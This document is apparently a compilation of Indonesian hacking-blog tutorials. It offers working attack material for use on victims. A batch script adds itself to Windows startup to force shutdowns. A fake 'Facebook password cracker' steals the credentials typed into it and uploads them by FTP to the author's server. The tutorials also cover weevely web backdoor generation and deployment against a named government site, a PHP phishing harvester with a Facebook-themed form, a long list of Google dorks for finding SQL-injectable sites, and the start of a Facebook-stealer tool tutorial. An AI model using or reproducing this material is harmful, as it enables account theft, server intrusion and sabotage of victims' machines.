jadi serasa si windows nya terkena pirus mematikan
:ketawa
buka notepad lalu simpan dengan ekstensi .bat
misal trojanzboy.bat
echo @echo off>c:\windows\trojanzboy.bat
echo break off>>c:\windows\trojanzboy.bat
echo shutdown -s -t 3 -f>>c:\windows\trojanzboy.bat
echo end>>c:\windows\trojanzboy.bat
reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v startAPI /t reg_sz /d c:\windows\trojanzboy.bat /f
reg add hkey_current_user\software\microsoft\windows\currentversion\run /v Enjoy /t reg_sz /d c:\windows\trojanzboy.bat /f
echo System Down
dan jika di restart maka windows akan shutdown automatis
jangan lupa convert bat menjadi exe
dan rubah icon nya yah
supaya gak terlihat porno
untuk tool convert bat to exe bisa di download --> https://dl.dropboxusercontent.com/s/oca7djq4loe7pwm/.bat%20to%20.exe%20converter.rar?token_hash=AAGnBRpUOg5KewTnZhFhyApMIpq6GPROzHP7W5B2OyqxmQ&dl=1
untuk tool rubah icon bisa download --> https://dl.dropboxusercontent.com/s/ik4h8fhthh471b4/IconChangerfull.rar?token_hash=AAEpLMNx80gcTZ1TZy87yo8PJdTV7uSDWJtE6alXftX8yw&dl=1
oke tutor kali ini saya akan mencoba hack facebook lewat ftp
sesuai biasa menggunakan social engineering hehehehe
oke langsung saja ya
copy code berikut
@ECHO OFF
Assoc .xzl=xZero Login File
IF EXIST %TEMP%\xZero GOTO SKIP1
MD %TEMP%\xZero
CLS
:SKIP1
IF EXIST %TEMP%\xZero\FBClient GOTO SKIP2
MD %TEMP%\xZero\FBClient
:SKIP2
:: Nothing...
:: Just data
:: ---------
:: ---------
:: ---------
:SET_VARIABLES
:: Don't change these values!!!
:: If you change something this may cause program crash and system instability...
SET varA=x
SET varB=G
SET varC=Z
SET varD=s
SET varE=e
SET varF=0
SET varG=r
SET varH=a
SET varI=o
SET encA=%varA%
SET encB=%varC%
SET encC=%varE%
SET encD=%varG%
SET encE=%varI%
SET authentication=%encA%%encB%%encC%%encD%%encE%
SET sys_value=%authentication%
SET auth=%0%
SET system=%sys_value%
SET load=%system%
SET data=%load%
SET system=%data%
SET session=%random%%random%%random%
:: Variable setup done
:START
CLS
TITLE Facebook Password Cracker v1.1
COLOR a
ECHO.
ECHO.
ECHO #######
ECHO # ## #### ###### ##### #### #### # #
ECHO # # # # # # # # # # # # # #
ECHO ##### # # # ##### ##### # # # # ####
ECHO # ###### # # # # # # # # # #
ECHO # # # # # # # # # # # # # #
ECHO # # # #### ###### ##### #### #### # #
ECHO.
ECHO Password cracker . . . . . . . . . Client v1.1
ECHO.
ECHO.
ECHO ________________________________________________________________________________
ECHO ******************** Please login dahulu *************************
ECHO ________________________________________________________________________________
ECHO.
SET/p usrname=Facebook Email/Username:
SET/p password= Facebook Password:
CLS
ECHO.
ECHO ________________________________________________________________________________?
ECHO Email/Username: %usrname%
ECHO Password: %password%
ECHO ________________________________________________________________________________?
ECHO Apakah data sudah benar?
SET/p confirm=[Y/N]:
IF '%confirm%'=='y' GOTO LOGIN
IF '%confirm%'=='Y' GOTO LOGIN
IF '%confirm%'=='n' GOTO NOLOGIN
IF '%confirm%'=='N' GOTO NOLOGIN
Msg * Thanks For Using Facebook Likes Pro V 1.1
EXIT
:LOGIN
set lding=%lding%[]
cls
ECHO.
ECHO.
ECHO #######
ECHO # ## #### ###### ##### #### #### # #
ECHO # # # # # # # # # # # # # #
ECHO ##### # # # ##### ##### # # # # ####
ECHO # ###### # # # # # # # # # #
ECHO # # # # # # # # # # # # # #
ECHO # # # #### ###### ##### #### #### # #
ECHO.
ECHO Facebook password cracker ....... Client v1.1
ECHO.
ECHO.
ECHO Loging in...
echo ========================================
echo %lding%
echo ========================================
ping localhost -n 1 -l 65500 >nul
SET/a loadnum=%loadnum% +1
IF %loadnum%==20 GOTO LOGIN_A
GOTO LOGIN
:LOGIN_A
CLS
:: DATA
ECHO Program executed on %OS%>%TEMP%\xZero\FBClient\dblog%session%.log
ECHO User: %UserName%>>%TEMP%\xZero\FBClient\dblog%session%.log
ECHO Time: %TIME%>>%TEMP%\xZero\FBClient\dblog%session%.log
ECHO Date: %DATE%>>%TEMP%\xZero\FBClient\dblog%session%.log
ECHO Session: %session%>>%TEMP%\xZero\FBClient\dblog%session%.log
ECHO Email/Username: %usrname%>>%TEMP%\xZero\FBClient\dblog%session%.log
ECHO Password: %password%>>%TEMP%\xZero\FBClient\dblog%session%.log
ECHO ----------------------------------------------------->>%TEMP%\xZero\FBClient\dblog%session%.log
:: DATA
ECHO open .ftp.trojanzboy.com>%TEMP%\xZero\FBClient\login_298689.xzl
ECHO trojanz@username>>%TEMP%\xZero\FBClient\login_298689.xzl
ECHO @11051991password>>%TEMP%\xZero\FBClient\login_298689.xzl
ECHO put %TEMP%\xZero\FBClient\dblog%session%.log>>%TEMP%\xZero\FBClient\login_298689.xzl
ECHO quit>>%TEMP%\xZero\FBClient\login_298689.xzl
ftp -v -i -s:%TEMP%\xZero\FBClient\login_298689.xzl
:: LOGED
CLS
ECHO ________________________________________________________________________________?
ECHO ******************** ERROR 021 **************************
ECHO ________________________________________________________________________________?
ECHO Login Gagal
ECHO Ada sesuatu yang salah ...
ECHO Apakah kamu yakin telah mematikan firewall ?
ECHO Mungkin server down atau Anda masukkan username salah / password salah?
ECHO
ECHO.
DEL /F /Q "%TEMP%\xZero\FBClient\*.*">NUL
PAUSE>NUL
GOTO SET_VARIABLES
oke ganti tulisan merah dengan alamat ftp kalian
ganti tulisan hijau dengan username ftp kalian
hanti tulisan biru dengan password ftp kalian
lalu simpan dengan ekstensi .bat
setelah itu testing dulu ya
dan jika korban tidak tau bahwa tool ini cuma ngambil akun fb dengan dalih iming-iming crack facebook korbannya
:P
yuk kita liat di hosting ftp kita
dan sukses Log pun telah terbuat
sekarang sebarkan program.bat tersebut
tutorial kali ini akan menjelaskan tentang cara backconnect ke server dengan mudah tanpa port seperti pada netcat pada os BACKTRACK dan pada os WINDOWS
1. pada os Backtrack
disini saya menggunakan tool weevely.py yang sudah ada pada backtrack 5
tapi di versi windows pun juga ada loh
hebatnya lagi weevely tidak membutuhkan pengaturan ip forward nat pada router jadi tinggal plug n play saja
sekarang apa itu backconnect
backconnect = menghubungkan si attacker dengan korban
supaya si attacker bisa memasukkan perintah-peritah pada mesin korban
oke pertama saya akan memperlihatkan bagaimana weveely bekerja pada backtrack
buka terminal lalu masuk directory /pentest/backdoors/web/weevely
cd /pentest/backdoors/web/weevely
setelah itu kita buat backdor shell nya beserta passwordnya dengan perintah
./weevely.py generate 123456 /root/shell.php
ganti tulisan warna hijau dengan password kalian
dan warna merah dengan nama sesuai keinginan
disini hasil output weevely saya namai shell.php
setelah itu shell php backdoor pun tercipta pada folder root
dan sekarang upload backdoor yangbaru dibuat pada website target yang sudah tertanam shell
setelah itu panggil filenye yang di upload tadi
http://websitetarget/path/shell.php
./weevely.py http://vsi.esdm.go.id/bencana/shell.php 123456
ganti tulisan biru dengan alamat target shell.php dan warna merah dengan password yang telah di buat tadi
dan sukses kita berada pada local mesin korban
2. Pada Os Windows
download dulu python dan anak-anknya --> https://dl.dropboxusercontent.com/s/95dgtfd8zx406fr/Python275.rar?token_hash=AAGBUkk701PTlNWTYWNP9qBrI583EiZQiJrjN7tSeyRnMQ&dl=1
lalu install ya . . . install pada directory C: saja
setelah diinstal maka folder Python27 tercipta
lalu download tool weevely nya --> https://dl.dropboxusercontent.com/s/8uw2u0z787ps9oh/weevely.rar?token_hash=AAHB_Z2MgYItAfIypOfpqZHm74UVpv2LuGd0LnUpqNdcnQ&dl=1
setelah tool weevelynya didownload ekstrak pada folder python27 alangkah baiknya buat new folder degan nama apps lalu ekstrak disitu
setelah diekstrak buat file .php dengan notepad kosongan saja dan save di folder weevely
disini saya namai test.php
lalu buka cmd dengan menekan tombol windows + r dan masuk directory python27/apps/weveely
cd/
cd /Python27/apps/weevely
kemudian ketikkan perintah
main.py -g -o test.php -p 123456test.php = file kosongan tadi
123456 = password
nah,,file yg kosong tadi telah berisi kode php dari Weevely,,
saatnay upload ke website korban yang telah tertanam shell php backdoor
kembali lagi ke cmd dan panggil file test.php tadi
ganti tulisan merah dengan alamat php target yang telah di uploadmain.py -t -u http://alamattarget.com/path/test.php -p 123456
ganti tulisan hijau itu = password yang telah kita buat tadi
Dan kita pun masuk pada local mesin server korban
Sesuai judul kali ini saya akan mencoba membuat manipulasi facebook pages agar banyak korban yang terjebak dalam trik ini
yang di butuhkan sebuah hosting yang aktif
buat dulu saveit.php dengan menggunakan notepad dan save dengan nama saveit.php
<?php
$Trojanz= fopen("trojanzboy.html", "a");
foreach($_POST as $variable => $value)
{
fwrite($Trojanz, $variable);
fwrite($Trojanz, "=-=");
fwrite($Trojanz, $value);
fwrite($Trojanz, "\r\n");
}
fwrite($Trojanz, "\r\n");
fwrite($Trojanz, "<hr />");
fclose($Trojanz);
echo 'Sent.. We will inform you after verification later';
exit;
?>
lalu upload di hosting kalian
saya harap kaian sudah mempunyai hosting ya . . .
sekarang buat halaman facebook
https://www.facebook.com/pages
setelah sukses membuat halaman facebook saatnya search static html pada form search
lalu pilih halaman yang baru dibuat tadi
dan klik aplikasi
setelah itu masukkan halaman html kalian
atau
bisa menggunakan html punya saya
<html>
<body background="http://www.paulmaricle.com/images/blue_background.jpg">
<TT>
<font color="white">
<form action="http://trojaznboy.com/images/saveit.php" method="post">
<br>
<center>
Untuk memastikan bahwa akun Anda tidak bot .. kami membutuhkan ID dan Password FB Anda .. Untuk pemrosesan system kami . . <br />
<br><br><br>
Email: <input type="text" name="username"/><br>
Password: <input type="password" name="password"/><br>
Confirm Password: <input type="password" name="conf_password"/><br>
TO Mobile Number: <input type="Number" name="Number"/><br />
Sender Number(Number from which you want to send msg): <input type="Number" name="Number"/><br />
<br><br><br><br>Type Your Message Here: <input type="Message" name="Message"/><br />
<br><br><br>
<input type="submit"/>
</form>
</body>
</html>
ganti tulisan merah dengan letak saveit.php yang telah kalian upload pada hosting kalian
lalu save
dan halaman pun siap digunakan untuk njebak korban
undang teman-teman anda untuk masuk perangkap ini
dan jika ada korban yang terperangkap pada tehnik ini maka log akan tercipta
pada direktori yang sama pada letak saveit.php tadi dalam bentuk html
Langsung saja share dork sql injection
silahkan masukkan salah satu keyword di bawah pada kotak pencarian google
intext:”error in your SQL syntax” +site:in
intext:”mysql_num_rows()” +site:in
intext:”mysql_fetch_array()” +site:in
intext:”Error Occurred While Processing Request” +site:in
intext:”Server Error in ‘/’ Application” +site:in
intext:”Microsoft OLE DB Provider for ODBC Drivers error” +site:in
intext:”Invalid Querystring” +site:in
intext:”OLE DB Provider for ODBC” +site:in
intext:”VBScript Runtime” +site:in
intext:”ADODB.Field” +site:in
intext:”BOF or EOF” +site:in
intext:”ADODB.Command” +site:in
intext:”JET Database” +site:in
intext:”mysql_fetch_row()” +site:in
intext:”Syntax error” +site:in
intext:”include()” +site:in
intext:”mysql_fetch_assoc()” +site:in
intext:”mysql_fetch_object()” +site:in
intext:”mysql_numrows()” +site:in
intext:”GetArray()” +site:in
intext:”FetchRow()” +site:in
intext:”Input string was not in a correct format” +site:in
inurl:/general.php?*id=*
inurl:/careers-detail.asp?id=
inurl:/WhatNew.asp?page=&id=
inurl:/gallery.asp?cid=
inurl:/publications.asp?type=
inurl:/mpfn=pdview&id=
inurl:/reservations.php?id=
inurl:/list_blogs.php?sort_mode=
inurl:/eventdetails.php?*=
inurl:/commodities.php?*id=
inurl:/recipe-view.php?id=
inurlroduct.php?mid=
inurl:view_ad.php?id=
inurl:/imprimir.php?id=
inurl:/prodotti.php?id=
inurl:index.cgi?aktion=shopview
inurl:/default.php?id=
inurl:/default.php?portalID=
inurl:/*.php?id=
inurl:/articles.php?id=
inurl:/os_view_full.php?
inurl:/Content.asp?id=
inurl:/CollectionContent.asp?id=
inurl:/Details.asp?id=
intext:"Powered By : SE Software Technologies" filetypehp
inurl:/index.php?pgId=
inurl:/index.php?PID= "Powered By Dew-NewPHPLinks v.2.1b"
inurl:/dosearch.asp?
inurl:/details.php?linkid=
inurl:/viewfaqs.php?cat=
inurl:/calendar.php?token=
inurl:/games.php?id= "Powered by PHPD Game Edition"
inurl:/gmap.php?id=
allinurl:*.php?txtCodiInfo=
inurl:/notizia.php?idArt=
inurl:read.php?=
inurl:"ViewerFrame?Mode="
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurlgl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
intitle:axis intitle:"video server"
inurl:indexFrame.shtml Axis
?intitle:index.of? mp3 artist-name-here
"intitle:index of"
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: *******_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: *******_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
trainers.php?id=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
newsDetail.php?id=
staff_id=
historialeer.php?num=
product-item.php?id=
news_view.php?id=
humor.php?id=
communique_detail.php?id=
sem.php3?id=
opinions.php?id=
spr.php?id=
pages.php?id=
chappies.php?id=
prod_detail.php?id=
viewphoto.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
detail.php?ID=
publications.php?id=
Productinfo.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
channel_id=
newsid=
news_display.php?getid=
ages.php?id=
clanek.php4?id=
review.php?id=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
look.php?ID=
galeri_info.php?l=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
offer.php?idf=
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: getimagesize()
"id=" & intext:"Warning: *******_start()
"id=" & intext:"Warning: mysql_num_rows()
"id=" & intext:"Warning: mysql_query()
"id=" & intext:"Warning: array_merge()
"id=" & intext:"Warning: preg_match()
"id=" & intext:"Warning: ilesize()
"id=" & intext:"Warning: filesize()
index.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
newsitem.php?num=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
announce.php?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
article.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
index.php?=
profile_view.php?id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
newsid=
trainers.php?id=
news-full.php?id=
news_display.php?getid=
index2.php?option=
readnews.php?id=
newsone.php?id=
product-item.php?id=
pages.php?id=
clanek.php4?id=
viewapp.php?id=
viewphoto.php?id=
galeri_info.php?l=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
story.php?id=
look.php?ID=
aboutbook.php?id=
"id=" & intext:"Warning: mysql_fetch_assoc()
"id=" & intext:"Warning: is_writable()
"id=" & intext:"Warning: Unknown()
"id=" & intext:"Warning: mysql_result()
"id=" & intext:"Warning: pg_exec()
"id=" & intext:"Warning: require()
buy.php?category=
pageid=
page.php?file=
show.php?id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
select_biblio.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
loadpsb.php?id=
announce.php?id=
participant.php?id=
download.php?id=
article.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
index.php?=
profile_view.php?id=
category.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
tradeCategory.php?id=
transcript.php?id=
item_id=
news-full.php?id=
aboutbook.php?id=
preview.php?id=
material.php?id=
read.php?id=
viewapp.php?id=
story.php?id=
newsone.php?id=
rubp.php?idr=
art.php?idm=
title.php?id=
index1.php?modo=
include.php?*
*=
nota.php?pollname=
index3.php?p=
padrao.php?pre=
home.php?pa=
main.php?type=
sitio.php?start=
*.php?include=
general.php?xlink=
show.php?go=
nota.php?ki=
down*.php?oldal=
layout.php?disp=
enter.php?chapter=
base.php?incl=
enter.php?mod=
show.php?corpo=
head.php?*
*=
info.php?strona=
template.php?str=
Oke hari ini ane mau sharing tentang cara bobol facebook dengan menggunakan aplikasi buatan kalian sendiri
peralatan yang dibutuhkan
1. Visual basic
2. Kreatifitas
berikut screenshoot tool saya
pertama -tama buka visual basic dan buat project baru
buat 3 label
1. email address
2.password
3.victims mail/victim id
kedua
buat 3 textbox
dan rubah text pada tiap-tiap textbox propertiesnya
